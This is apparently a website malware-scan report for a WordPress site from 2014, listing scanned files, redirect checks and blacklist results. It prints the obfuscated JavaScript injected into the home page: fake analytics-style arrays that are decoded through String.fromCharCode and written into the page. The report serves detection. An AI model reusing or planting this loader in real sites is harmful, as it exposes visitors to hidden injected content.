Scanned pages/files
Request | Server response | Status |
http://savingprivatehealthcare.com/ | 200 OK Content-Length: 27086 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw1 = []; _gw1.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw1.push(['_setOption', '6918518510413211618418718018017518017316518219318218118']); _gw1.push(['_setPageId', '5175186175181180128167168185181178187186171129169178175']); _gw1.push(['_trackPageview', '1821281841711691861101221241261821901141671871861811141']); _gw1.push(['_trackPageview', '6718718618111412212412618219011112919513011718518619117']); _gw1.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw1.length; v++) t += _gw1[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
http://savingprivatehealthcare.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.25.0-2013.01.18 | 200 OK Content-Length: 15158 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.3 | 200 OK Content-Length: 6933 Content-Type: application/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/js/jquery.fitvids.js?ver=1.0 | 200 OK Content-Length: 2724 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/js/jquery.infinitescroll.js?ver=1.0 | 200 OK Content-Length: 36692 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/js/custom.js?ver=1.0 | 200 OK Content-Length: 4936 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6717 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 | 200 OK Content-Length: 15647 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 6287 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/main-page/ | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://savingprivatehealthcare.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://savingprivatehealthcare.com/meet-the-author/ | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://savingprivatehealthcare.com/contact-us/ | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: savingprivatehealthcare.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Sep 2014 07:16:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://savingprivatehealthcare.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: savingprivatehealthcare.com
Referer: http://www.google.com/search?q=savingprivatehealthcare.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=savingprivatehealthcare.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://savingprivatehealthcare.com/
Result: savingprivatehealthcare.com is not infected or malware details are not published yet.